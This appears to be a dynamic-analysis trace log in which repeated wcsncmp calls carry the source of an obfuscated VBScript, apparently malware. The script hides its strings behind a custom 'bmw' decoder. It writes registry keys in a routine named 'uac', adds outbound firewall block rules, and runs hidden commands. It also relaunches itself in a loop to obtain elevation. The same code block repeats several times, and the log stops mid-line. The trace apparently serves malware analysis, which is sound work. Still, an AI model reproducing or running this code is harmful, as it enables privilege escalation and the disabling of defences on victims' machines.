bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.309] wcsncmp (_String1="d(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.309] wcsncmp (_String1="(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.309] wcsncmp (_String1="s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.309] wcsncmp (_String1="1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", 